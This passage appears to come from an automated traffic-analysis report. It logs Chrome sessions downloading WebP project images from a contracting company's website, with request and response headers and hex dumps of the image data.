a1 ba 4c 7b e3 68 15 0b 62 f6 26 0f 21 b2 8d 1c 30 2b 93 7b
                                              Data Ascii: qeZRl/'~7%vE4[IJ"hJ6nj!yB,te&ypi^m}&JfNE<z+;/kXA1?lZM0;"!:=^UbY&H/_M!YyL{hb&!0+{
                                              2024-09-27 06:20:15 UTC8000INData Raw: 22 1e b1 02 41 23 6c f6 36 93 81 01 46 a1 63 1d d1 4a 58 b8 ae 7f cc ba 34 5a c7 80 6d 2e 50 3b 1a 51 3c 00 b5 c6 61 c4 a1 ce c6 27 79 79 49 ad cc 7e a5 16 bc 8f bd 00 b2 c5 e5 3e da 26 8a 53 78 3a 94 bd ba 2f a8 6b e3 47 97 3c d0 51 10 6f 0a f2 78 59 ca 60 c2 6d 5e 13 17 bc 9e e6 bc a9 b9 9b d4 e5 29 f0 4a 94 f9 e9 c9 58 5e 17 f4 b0 40 2e 81 20 92 3c fa 66 43 65 65 e9 c1 63 95 3c 7e 20 72 9f 14 ec f6 e6 3b c8 bd 5a 10 61 ee bb 86 bc 74 f9 80 8d 58 26 77 ce df 6d a7 30 7d 65 59 48 ba f1 dd 1a 7c 14 ea f5 93 6b e5 1c bc 4c 5e f5 81 a3 a0 8b 2a fe 91 12 5a ce 81 2b cd 3c fd 45 bd d2 b0 e3 d9 15 06 f6 02 54 5f dd 2a 4d 71 a1 04 c2 84 21 82 60 a4 a5 ee 4f ea 8b 96 12 6a 2a fd 9c 00 e6 34 f8 64 80 90 63 72 09 e6 73 f3 5d a5 ff 41 78 fc 25 a4 2f d3 00 90 a1 cc
                                              Data Ascii: "A#l6FcJX4Zm.P;Q<a'yyI~>&Sx:/kG<QoxY`m^)JX^@. <fCeec<~ r;ZatX&wm0}eYH|kL^*Z+<ET_*Mq!`Oj*4dcrs]Ax%/
                                              2024-09-27 06:20:15 UTC8000INData Raw: 22 83 27 72 c3 b5 95 19 4c 59 7f ba 1e e7 e6 8f 2f 66 2f e1 15 6b 16 c7 76 b4 92 cf 17 c5 d7 7a a6 9a 70 58 1c 79 bb 56 d3 0b 31 be ae e7 8a df e8 ff 30 0f 58 56 30 4d 87 d0 cc bf 8c 16 5a 23 c7 c5 db 96 3d c1 30 76 5f 93 a6 4b 76 36 4f eb f5 d4 f3 29 fa e7 56 c9 9f a9 18 eb 65 76 b3 85 cc 9a 65 e2 5b 5a 27 73 1f ab ec 58 22 9a 09 48 b5 13 3b d5 f6 29 03 be 70 1f 98 d2 65 83 4c 10 4d 5b 1d 0d fc 53 db 24 71 91 fb 7f b9 b6 51 63 6f 52 ce de cc ea d0 ea 3b 23 cd eb e8 4c 25 25 86 5f ab fd 47 7f 77 d4 a7 85 d9 af e0 03 be de ea f1 ff d7 cb 35 23 a5 df 71 6b 83 d1 6f 40 2a 2e 6f b1 ce 0a 00 b2 04 1a 5d 83 10 5c f1 2b dd 31 36 74 56 ab 25 a1 b3 fe f8 e8 fc eb 61 57 8c 93 bf cc 39 8f 50 42 61 99 e0 02 7b f0 87 0a 16 22 c6 b9 81 55 67 66 47 1a d4 43 b5 b7 82 f9
                                              Data Ascii: "'rLY/f/kvzpXyV10XV0MZ#=0v_Kv6O)Veve[Z'sX"H;)peLM[S$qQcoR;#L%%_Gw5#qko@*.o]\+16tV%aW9PBa{"UgfGC
                                              2024-09-27 06:20:15 UTC8000INData Raw: 52 52 d6 f9 b1 88 cf fb e4 92 13 6c 83 84 94 5a 72 61 c4 bb 8b 6d 0c 0c f8 d6 7b f4 0d 36 37 fa 86 de 63 2a 3b c9 00 61 9c e2 52 3b bd 38 55 1c ee 32 3c a0 3c 95 40 0f 0b 9f 45 78 db 88 d1 4c e3 1a f0 e6 c0 e6 3a ae 65 b6 38 4d 5c ef 52 8e 9a ad 80 2e 8d 35 d1 54 66 d7 30 e9 38 9d b0 a0 3d ac 4c 9c 53 80 2c 75 a2 69 b9 7f 51 ec 13 8c 7e a0 88 6d 19 f1 2d b5 2e 07 a5 46 29 5e 54 de 3a 2e 2b 39 00 d5 ee 6b be 4c c6 fe 8e 4d 25 e4 75 86 9a 36 9c 75 6d 73 54 9e b2 59 82 65 ca a6 d8 3a e0 be 5b 2d 43 68 eb 97 af ec ce 1f 5c f9 47 de 1a ec 95 d2 66 5c 50 44 c1 8d 77 04 a4 d0 57 9a c3 16 fb ab 31 10 44 7f 58 9c 31 53 52 8e 51 8d 88 7c c2 56 1e 38 90 dc 68 87 f2 30 c3 b4 dc ce 6b 4e 6c 60 60 a6 68 6a 53 e7 45 3d e9 59 9f 50 17 9f 18 25 94 52 0a 1c 82 a3 de 61 1e
                                              Data Ascii: RRlZram{67c*;aR;8U2<<@ExL:e8M\R.5Tf08=LS,uiQ~m-.F)^T:.+9kLM%u6umsTYe:[-Ch\Gf\PDwW1DX1SRQ|V8h0kNl``hjSE=YP%Ra
                                              2024-09-27 06:20:15 UTC8000INData Raw: 0c b6 e4 a0 be 2e 2e ad 84 43 57 b2 93 f8 90 90 87 6a b4 90 90 45 7f b4 44 b5 c3 5c ca 6b 20 69 3b 46 7a 63 12 7a db 48 05 bc 3c 9b 62 68 ac 8f 39 16 eb 8a 03 3c a7 39 15 3a ee 23 59 d0 d1 e8 69 fb e1 c5 0e 9e 78 1c 98 71 4e 45 61 18 75 19 0c 9c 9c 45 d4 1b a2 36 bd 00 90 be 52 66 4c 6b 9d fb a1 8c f0 bb 1a 55 ed 2b ef b5 04 14 49 3a 99 86 51 d2 0f c6 2e 65 ff 6a a9 36 48 fa f0 43 b1 af aa b5 8d 38 68 de 68 6c d9 54 ce c3 e5 8a ad cf 8c 44 48 7a 10 97 a1 38 c4 51 b1 0a 4a 86 f2 0b dd 8c 8f 9d 35 43 73 a2 7d 41 f0 43 06 6e 72 9a ec d0 48 b8 28 ae 33 51 0b d6 15 79 d6 57 c9 4c bb bb 6f 7a 7d 0d db ae 71 69 28 b2 21 69 7c 00 89 63 26 bc ad 47 19 cb 7d 0d cc 46 9d 07 bc 78 2b a7 ad 17 e5 9f 91 6c 3f 8a 42 c9 e0 1f 6a e0 f0 9f a0 ed 52 4a 36 2e 09 92 37 04 02
                                              Data Ascii: ..CWjED\k i;FzczH<bh9<9:#YixqNEauE6RfLkU+I:Q.ej6HC8hhlTDHz8QJ5Cs}ACnrH(3QyWLoz}qi(!i|c&G}Fx+l?BjRJ6.7
                                              2024-09-27 06:20:15 UTC8000INData Raw: e2 dc 21 c4 84 31 8e ce b8 b4 61 3e 8e a4 ca 0a 87 68 bb f6 65 bc 26 6d c7 8d 06 36 e3 c5 54 b7 e6 8f 2a 44 c2 2e 7a a5 46 df 64 6f 22 12 6f c2 09 49 ee f7 93 c7 3a a1 80 37 0f ee 08 ed b7 a8 fc 4a 92 83 74 6f bc 2e f0 d4 51 1c bb 8b ba 53 26 4c 78 ac b0 aa e2 0d 37 20 4b 1c 79 e1 43 42 d6 2c 5f 6b ef e2 64 de a0 52 41 cf 73 97 e0 16 e3 5c 61 0e 3b 4e 89 64 46 a5 7d 79 45 9b 28 9b 88 ab a7 11 29 f8 b7 f5 2e 4f 82 68 9a 0b 86 97 96 62 6f a2 4f 0e 2a 6a 43 e9 4c da 9f 01 a7 64 95 e8 29 f0 6c ef 28 0f 61 81 61 6d cc 1c 28 22 90 4b ce da 4b 6c 83 f1 9a 76 cf da 97 d4 1b bc bd 26 69 e4 db c6 34 16 5f aa 28 11 97 15 61 74 8d 58 d0 f2 8a 48 65 fa 0b 89 61 76 fa 31 bc 60 5e b5 d3 ae b3 f4 91 12 b6 69 3d 1b 08 30 a1 f3 8f 73 2f f9 68 7c 5f 33 31 ef e6 1b 34 b7 98
                                              Data Ascii: !1a>he&m6T*D.zFdo"oI:7Jto.QS&Lx7 KyCB,_kdRAs\a;NdF}yE().OhboO*jCLd)l(aam("KKlv&i4_(atXHeav1`^i=0s/h|_314


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              86192.168.2.465422173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:15 UTC724OUTGET /uploads/projects/16/f2e9aef4e6dba3f5ab1fba99f80ec53b.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:15 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:15 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 10:51:43 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 32144
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:15 UTC7931INData Raw: 52 49 46 46 88 7d 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 14 7d 00 00 d0 9a 03 9d 01 2a cf 04 a3 03 3e e9 70 b2 54 29 26 34 b9 a2 12 c9 f3 30 1d 09 67 6e dc 8a dd 1e ca c6 8d ef 00 b5 e5 f5 a0 03 1c 56 6d 7a 44 78 47 3d 6f 28 bf e2 b3 7c 0e ba f8 77 fc e3 08 13 0c 5a 79 ab 7e 69 de 79 9a e7 44 fd 11 ff d6 a0 14 6e ad ac 37 f5 06 76 76 32 f5 1b fd d3 fc 5f b0 37 43 df 31 1f b7 7e a9 7e 92 ba 24 fd 66 3d 07 ba 62 7f b8 64 a4 fd 3f ff 2f 9e 7f a2 7f 83 e1 2f e7 fe f6 9b a4 61 7f eb bc 1f fe df fc f3 3a 9d c5 fe c7 fc bf 25 dc 8a f9 79 42 3f a8 79 67 c9 7f a1 ce 4f df b7 f4 47 ff e9 e9 df ee cf 4c 11 88 8f e9 c7 d9 85 f0 54 3d 4c a8 64 20 25 43 a9 e4 70 72 8d 5b 59 bb 0b e1 99 b8 9a 28 aa 3c 9b 04 ee 52 c1 fc 83 ac
                                              Data Ascii: RIFF}WEBPVP8XVP8 }*>pT)&40gnVmzDxG=o(|wZy~iyDn7vv2_7C1~~$f=bd?//a:%yB?ygOGLT=Ld %Cpr[Y(<R
                                              2024-09-27 06:20:15 UTC8000INData Raw: f6 76 8d 8e 6d 67 f4 15 88 b3 b2 b4 05 75 c4 44 86 84 09 40 00 0d 02 b3 df d5 1e fd 44 d3 08 05 c1 7c 16 28 e4 4d 90 0f 6f 06 b0 2d e1 fc 6e c0 9d 6e e6 3d cc 49 bc 49 95 f0 42 20 cb ba 33 f6 ea b3 4f cc 0d 32 fe 0f 59 81 ed 33 a5 d6 43 6a 30 b5 a3 4e a3 ad 6b 80 37 00 ac f5 ef f9 ec 51 b0 b4 a1 5a f7 45 bb 1e fe 26 08 00 02 bc 70 ce 5c 0d 3f 62 35 be 55 48 24 da 7b b1 03 72 c2 5d c6 19 c4 9b 0b 98 a9 20 86 e9 1e 2b d9 a8 ef 1e c5 49 de 76 05 f8 f3 0d d9 08 d4 df a4 59 8f c7 bc bf 09 a0 de 77 c6 18 d4 4b 5c cf e0 16 95 6a 76 01 02 e5 78 61 74 cc 14 e0 cb 28 3d 34 2a c1 eb 0b 4e f5 3a 90 17 b9 cb a1 35 e4 15 02 c7 08 47 b0 5b cd 29 39 7d 2b 47 cf 33 94 fe 94 7c f4 05 bf 3d ea 7d 39 6b 11 2f 8e c6 02 07 14 7e b8 18 2a 83 d4 7d d1 44 b3 4b 84 8a 67 c2 ed e9
                                              Data Ascii: vmguD@D|(Mo-nn=IIB 3O2Y3Cj0Nk7QZE&p\?b5UH${r] +IvYwK\jvxat(=4*N:5G[)9}+G3|=}9k/~*}DKg
                                              2024-09-27 06:20:15 UTC8000INData Raw: 7b 72 17 ef 00 9d 09 b0 41 b3 c4 ba 1f 58 47 f3 be b4 84 cb e3 5d 1a 71 bf 34 a1 ca f9 65 26 57 a0 29 08 e9 05 c9 e9 92 f7 8f 29 34 83 17 43 d4 10 a0 16 bd 0f 76 0c e6 38 b1 b8 1e 8f 25 47 48 fd cb b1 e9 ad 39 17 a3 ce 1b a6 3d bf b9 6c 32 19 fe 30 12 e9 5c 92 61 64 44 6f 5a 4b 54 3f c2 a1 ac 53 58 a9 ef ba 05 ab 3d a8 06 ac 5f f4 d1 cd e8 0a d6 e5 2f bc 9c a8 ea 03 67 1e e3 34 35 5c 4b e3 25 5f 28 7c f0 ba df 00 97 fd f9 39 2f 7a f0 28 7a 19 2a 68 d3 42 e0 f5 fd 72 c7 05 fa 61 a5 80 0c 8a 93 89 03 ee 02 0b 56 cc 97 03 70 68 ad e1 94 31 c0 ad b6 7e 1d a1 fe 5a 4c b6 79 42 c1 e4 0b 53 a0 f6 bf 38 f7 d8 58 85 91 1f 7d c2 58 f3 7d 81 96 f6 58 6a ef 13 91 13 b9 20 53 b9 24 b1 01 77 a3 58 86 0f 1e dd 41 25 28 21 de 93 97 27 10 d1 cf 13 4b 56 ea b2 00 6d 36 3e
                                              Data Ascii: {rAXG]q4e&W))4Cv8%GH9=l20\adDoZKT?SX=_/g45\K%_(|9/z(z*hBraVph1~ZLyBS8X}X}Xj S$wXA%(!'KVm6>
                                              2024-09-27 06:20:15 UTC8000INData Raw: 51 8a 0d 42 ee 9e 2a af 7e d3 8c 9b 46 37 83 c9 50 ce 4a ed bb 39 75 13 3f fb 58 5f 15 d1 b2 83 b0 53 8d 4e 69 b6 fe 1e b4 26 f0 3d ca 02 6a 02 b6 3e 70 1b 1e 5b ac ef a2 13 06 4c ba b3 e9 f7 a7 d0 76 ce dd c8 84 c8 8d d5 6f 18 57 09 92 2e 89 67 76 3a 41 f3 06 b7 a2 f0 53 ee bd 8f b2 21 25 bf 6d 11 28 52 b9 93 66 34 bb 46 e2 97 70 52 e2 71 90 2f 0c 02 23 c3 81 01 8d 8e 13 05 ab bc 0d 08 7f 7a 30 68 b1 a3 d3 d4 71 51 44 67 7f 5b 37 8a 9e 6e 7c 69 45 60 a8 a8 65 65 ab 82 7f a4 77 03 2a 2c 38 ea e5 58 84 e5 06 38 ed e5 f6 f5 d4 de 72 c7 4f 4b 83 c0 46 01 46 f8 cc 3d 77 53 ba 35 ff e0 9f 26 49 1e e5 db e4 cd bb 70 9e d0 c7 40 24 b9 a6 2d 6a 14 43 e9 49 28 2c 2a 9d 42 c7 e2 76 6a 1e 18 bd f5 9d fd cb 20 16 24 c1 52 76 5a 3d d4 25 a8 a2 73 5c 22 05 cc 0e eb e8
                                              Data Ascii: QB*~F7PJ9u?X_SNi&=j>p[LvoW.gv:AS!%m(Rf4FpRq/#z0hqQDg[7n|iE`eew*,8X8rOKFF=wS5&Ip@$-jCI(,*Bvj $RvZ=%s\"
                                              2024-09-27 06:20:15 UTC213INData Raw: c8 7d bd 48 09 b7 06 b8 21 ef 9b 6e 8c c8 83 ed bf 5c a5 9f c3 40 80 d4 9a b6 f9 ff 84 e2 31 49 88 9a b0 0f 49 b6 d8 c3 bf e0 44 84 a5 24 01 ba be f2 54 82 ab 0b 78 5c 0f d9 59 76 ad ce 64 92 c5 29 a3 83 cf b3 e4 e4 89 2b 08 30 3a 56 db 9f 3d 03 13 8d 54 9a 3d 26 29 26 91 09 64 46 49 87 fd 44 ca 17 bc c1 88 6f bd 07 cd 77 50 25 f6 13 13 44 4e 70 53 7a 97 b5 4c c3 bf e4 89 40 00 50 53 41 49 4e 00 00 00 38 42 49 4d 03 ed 00 00 00 00 00 10 00 48 00 00 00 01 00 02 00 48 00 00 00 01 00 02 38 42 49 4d 04 28 00 00 00 00 00 0c 00 00 00 02 3f f0 00 00 00 00 00 00 38 42 49 4d 04 43 00 00 00 00 00 0e 50 62 65 57 01 10 00 06 00 2a 00 00 00 00
                                              Data Ascii: }H!n\@1IID$Tx\Yvd)+0:V=T=&)&dFIDowP%DNpSzL@PSAIN8BIMHH8BIM(?8BIMCPbeW*


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              87192.168.2.465425173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:16 UTC724OUTGET /uploads/projects/18/d4358b3300881d66d5be0da1f9c2ed79.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:16 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:16 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 11:25:46 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 44502
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:16 UTC7931INData Raw: 52 49 46 46 ce ad 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 5a ad 00 00 f0 9c 04 9d 01 2a cf 04 a3 03 3e e9 70 b2 52 a9 26 aa 2f a4 d1 7a 61 f0 1d 09 65 6e d8 31 03 d1 e6 52 b2 ff c3 c9 cd 7d b9 f2 73 7a ea 41 9b cb 79 2a 74 cc 8b d9 97 e3 1f b6 87 e6 9d 4c 92 b7 5c 85 fe 7a 72 71 df 1e 7f df 7a fd 67 c7 e1 38 77 7f 63 97 dd bf 7e ba bf aa f4 34 5e 5a 5f 1c fd 37 ff 27 9e 4f a1 ff 85 e1 2f e7 7e f8 db 69 e1 8f e4 bc 1a fe c7 fd 77 ff 9f f1 fd af ff 8d e3 4f ce 29 9d ef 2a d9 7f e5 fa 19 7b bb ef ff a4 9f fd 7a 5b fe 3f ff 3f 57 bf fb 3d 79 f4 1c fe 3f 44 4f fe 9f be 7e d3 95 aa 44 80 a6 ba 40 53 5d 20 29 ae 90 14 d7 48 0a 6b a4 05 35 e0 44 c6 ba 40 53 5d 20 29 ae 90 14 d7 48 0a 6b a4 0a b3 8d 74 80 a6 ba 40 53 5d
                                              Data Ascii: RIFFWEBPVP8XVP8 Z*>pR&/zaen1R}szAy*tL\zrqzg8wc~4^Z_7'O/~iwO)*{z[??W=y?DO~D@S] )Hk5D@S] )Hkt@S]
                                              2024-09-27 06:20:16 UTC8000INData Raw: d4 fd 39 3f 23 f6 94 2d 3c 56 f6 9c 8d c5 c6 b4 7b e5 c6 be dd e0 22 a6 fa 73 13 63 a1 9a e4 d4 f8 ab c6 e0 ee e1 3a 4e fb 5d 6a ec 93 d2 f3 5b 6a e7 5d 45 b2 9b 3e 37 cb 25 89 63 a4 14 93 7a a0 a6 44 1d 47 a0 d8 2d cf 9d 51 d0 95 4f e6 d9 ca d1 08 21 d7 ee 45 ce 4c e6 6e eb 14 12 7d 10 9d a2 eb c6 81 57 45 46 a0 64 95 fe 79 e4 df 74 d5 3a 86 b0 cd ad c8 45 56 67 17 53 8d 6a f5 1a 1e 91 22 fb a0 84 16 4f c3 b3 f2 b3 8e c5 5d 2d f7 a0 0c 8a ef 20 ff bd 06 b2 09 8f 51 15 c0 2e 65 8f 74 b7 d6 9d 32 86 10 f4 60 7d 05 43 91 30 1e 97 94 58 4e ef 0f 5e e4 22 d9 54 20 c0 d2 41 10 4d 6f 58 42 c7 16 f3 95 1d 33 64 6c 47 76 ba 8c b5 ec 2c 2f ca 8b 68 3f ff f1 03 ff 01 d5 97 d0 50 09 fa 49 97 b8 80 93 ad a1 bc 23 95 7c 2d ce 5f ab 90 fc f2 45 2d ef 61 b3 4e 9c 6e 5f
                                              Data Ascii: 9?#-<V{"sc:N]j[j]E>7%czDG-QO!ELn}WEFdyt:EVgSj"O]- Q.et2`}C0XN^"T AMoXB3dlGv,/h?PI#|-_E-aNn_
                                              2024-09-27 06:20:16 UTC8000INData Raw: c3 b3 84 ea f0 e3 6e 2e 04 9f a1 01 44 bf ae c8 c0 4e 41 b0 a5 f5 ae c4 c8 de c0 49 bc ca d6 2a 26 1e 43 ff ed 3c a5 42 b1 b4 53 f5 d3 36 ec c1 25 98 cc e8 6e 3b 1b b7 f7 d3 1d c8 ed ad 72 8d 70 4a 4a 01 a5 44 5a 07 fb 18 6c cf 5a cd a9 6b 28 d1 f3 5c 04 58 ea 23 c7 f4 03 b7 d6 00 10 13 5d 7d c6 5f e8 c3 a8 87 ae a4 b7 37 77 37 4e fb 38 63 37 47 64 88 0b 20 e4 2b 70 13 cd 01 92 ce 0b 17 f5 b6 ec 69 f2 e8 cf b3 ef 79 cd 2a 3f cd c1 2e d8 a6 07 ba a1 ee 7a a1 42 b6 56 0f 2e 53 51 a7 50 56 4c 44 ec 89 72 3b 60 aa 4c 1a ba 72 d9 8e 59 82 cf b9 05 8c 2c 25 67 86 fc 59 d5 db f9 96 2c e7 1e 3e 98 2b 43 90 ae 62 8b 03 8f 72 6a e5 76 4d b0 ab 3c a5 22 41 f2 aa a8 0d bc bf d5 35 2e 79 27 4e 03 9d 34 2a 52 df 2d d8 79 0d 44 08 02 01 e7 60 c2 01 4c 91 66 26 d9 35 41
                                              Data Ascii: n.DNAI*&C<BS6%n;rpJJDZlZk(\X#]}_7w7N8c7Gd +piy*?.zBV.SQPVLDr;`LrY,%gY,>+CbrjvM<"A5.y'N4*R-yD`Lf&5A
                                              2024-09-27 06:20:16 UTC8000INData Raw: 74 ec cf d8 3b 3c 28 1a 3d 5b be 93 1e 4f bb 51 47 ba 06 9f 7d 20 1d f9 e0 64 77 55 7b af 78 29 45 c9 f8 14 60 be 35 c0 d7 dc 68 cb 0c 7a a6 83 ed ec fa 25 2b a0 b2 52 ba 99 5d 26 f1 d4 0b 30 44 95 a8 cf 98 c8 c3 f3 b2 4d d7 3c 35 a7 57 64 8c 54 09 e2 1e 1b b4 13 8c 78 1c 23 34 6c 45 08 54 d7 25 80 ee a9 51 84 36 b2 ee bc 19 50 52 8a 1a 98 70 0f a2 29 43 18 cb de 7a 16 f8 61 cd 70 f3 8c b9 dd d9 2e 75 89 f3 0d 61 60 fc ba a3 67 2b ab b9 0c 77 09 3f e3 c5 91 b5 72 3f aa 53 89 26 87 74 a6 5b 23 ee 9b 67 aa 0f 17 de cb 29 aa 22 30 28 63 52 cb f7 57 2b 07 55 c6 a2 e4 ae 02 81 ef c0 f7 63 b4 00 bb 24 55 d9 fd 4b b2 93 e3 6c 32 f7 c4 61 c7 29 16 c0 02 ff 36 76 82 ea af 8a bd 8e f6 d0 df 5e d3 67 11 a6 32 da 9e 7c ad 05 c0 71 67 53 1d 3f 28 f9 95 2a 81 92 2d b8
                                              Data Ascii: t;<(=[OQG} dwU{x)E`5hz%+R]&0DM<5WdTx#4lET%Q6PRp)Czap.ua`g+w?r?S&t[#g)"0(cRW+Uc$UKl2a)6v^g2|qgS?(*-
                                              2024-09-27 06:20:16 UTC8000INData Raw: 98 b3 47 40 70 6f 69 4c 2b 1c 62 9c 06 33 fd b2 dc 68 d1 d0 8a 66 0d 4b 52 1f 06 7e 7a bc bf f3 e8 8c 81 da 65 ea b3 b5 6b d1 da 02 da bb f5 98 eb b4 ce 22 88 ac 43 e6 ca 95 4d 7d 8c 67 bc 9e 3e 4d a1 d3 36 62 d4 ba ef 66 76 72 ed 71 58 f7 4f 72 9c e0 2c 10 cb 69 a7 5a 87 5f 7f 7f 3a f1 d8 aa a0 99 dc 32 fb fe c1 39 a4 16 d7 4e 27 0d 17 6b a0 0f ae 1d 5b 67 37 bf 77 23 33 4e 87 52 8e e6 79 83 33 f1 e4 70 f1 b5 7f 58 fa 35 ea 2d 67 ac 1f a1 1a 3a f8 93 68 93 e7 44 17 be 3b 69 23 03 0a 7d dd 23 df 4a 35 85 44 de 33 ee cc ed 86 4a d1 a3 2c ad 6d f2 95 c2 35 82 cd 8c 9e d6 aa e6 6d 01 f2 dd 1d 61 1e 16 99 4d 6c 88 ae 86 a3 4e b8 1b 8c 91 96 3f aa 9e cd 7f 60 5d 00 bd 51 7d ba ea 01 bd 2f aa fc be 58 0e bb f0 30 eb 40 d0 fd 9d 13 4c 03 09 30 06 02 1d 39 ea 6e
                                              Data Ascii: G@poiL+b3hfKR~zek"CM}g>M6bfvrqXOr,iZ_:29N'k[g7w#3NRy3pX5-g:hD;i#}#J5D3J,m5maMlN?`]Q}/X0@L09n
                                              2024-09-27 06:20:16 UTC4571INData Raw: 41 24 cb 19 34 f6 00 d3 0a db 7e c8 f0 3c 36 bc 2c 09 c7 08 a3 e7 2c d0 49 c0 48 87 1c c5 d5 f1 19 13 09 ed dd b7 39 35 3c cc 3f 3e f0 2c 53 1d 2a 52 28 cb 54 d2 2a 0d 44 9d 65 57 6e a2 91 ea a6 c5 0b 01 4e 8d 49 38 96 66 bf f9 22 b8 17 62 4f 87 91 ee 96 6a 08 4c c5 70 c1 3e 56 b7 02 96 82 2c a3 1c 47 14 22 e4 16 5f b9 c3 c8 ea ef c6 07 db 6f 15 15 50 d0 b2 93 fa 20 d4 4b 4d 49 9a ec 41 99 c3 2d 3b 37 25 9e b7 cf 3a d4 67 0e dc df ab 52 e7 db e6 f3 71 2b f6 bd b9 10 d8 e1 85 ac 90 95 f3 ad d3 7e 55 15 01 00 20 a0 70 22 00 b9 3e 11 8d 4d ce f5 a2 ea 27 e3 25 c6 08 87 86 7b 19 44 e7 08 30 eb 53 4a 95 af d3 75 cf 5b b6 b2 88 91 c3 1f 64 b0 8c f1 cb ff db 93 79 52 0e 96 2d fe 9e 75 85 f1 17 2a 14 9f a6 ee 33 ae 45 4f ba bc 52 ff ad 87 af 93 f7 ba 50 12 52 6e
                                              Data Ascii: A$4~<6,,IH95<?>,S*R(T*DeWnNI8f"bOjLp>V,G"_oP KMIA-;7%:gRq+~U p">M'%{D0SJu[dyR-u*3EORPRn


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              88192.168.2.465424173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:16 UTC723OUTGET /uploads/projects/9/da3ea8845675faf87c497231993e7480.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:16 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:16 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Wed, 11 Jan 2023 14:28:53 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 58040
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:16 UTC7931INData Raw: 52 49 46 46 b0 e2 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 3c e2 00 00 b0 b0 04 9d 01 2a cf 04 a3 03 3e e9 6e af 53 29 26 33 bf a3 13 0b 1b f0 1d 09 65 6e 2d b9 5c 5f 72 c7 6b f4 b9 ac ed 5f ec f8 d1 48 d7 a5 f2 9f ff 07 e4 76 77 bf 99 73 bb f1 cd fe 74 76 98 bc 9f 6c 4e d7 ff cd 9e 65 43 aa df f3 7c 55 bd 7b fd 8f b0 1f 95 af fb 3e 14 5e 27 fe c7 b0 7f 97 ef f5 3c f1 e6 d7 e9 49 fb 27 fd 3e 8c 8d c9 91 6c 87 fb ad 1f fb 07 ec 4f fa ff 77 ec af a0 ff 90 e1 d1 fe 7e 74 fd 4f ff 82 f4 f1 f4 2b eb 2f fb 4f 45 5f 9d ae fe 4f f4 2e 9b df 4c 6f 5f fd 2a 1f 98 ff f5 f3 f3 f4 6f f2 3c 27 fc e3 b0 f3 18 ff 59 dd c7 f6 86 77 ff cf f1 1f f6 af e4 7d 06 bd c7 e7 63 1f ae 65 